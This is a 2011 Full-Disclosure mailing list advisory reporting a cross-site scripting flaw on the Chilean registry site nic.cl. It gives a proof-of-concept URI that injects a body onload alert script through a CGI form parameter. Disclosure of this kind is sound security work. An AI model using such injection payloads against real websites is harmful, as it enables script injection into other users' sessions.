[Full-disclosure] XSS on NIC Chile



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

* Main URI: http://www.nic.cl

* Type: Cross Site Scripting

* Exploitable URI:
http://www.nic.cl/cgi-bin/show-form?f=/example/201001191941%3Cbody%20onload=alert%28this%29%3E3a6

* Status: *Reported*

* Date: April 20, 2011, 12:27 p.m.

Reported on: http://www.secureless.org/vulnerability/1347/




- --
Zerial
Seguridad Informatica
GNU/Linux User #382319
Blog: http://blog.zerial.org
Jabber: zerial@xxxxxxxxxxxx
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAk2u/XQACgkQIP17Kywx9JTzjQCeNIbJsr/6fZ1Pr2mO8u7Jb3jA
TmsAoIdn2ceeo9iO4iC8MmwWO/6tUfRk
=sCbb
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages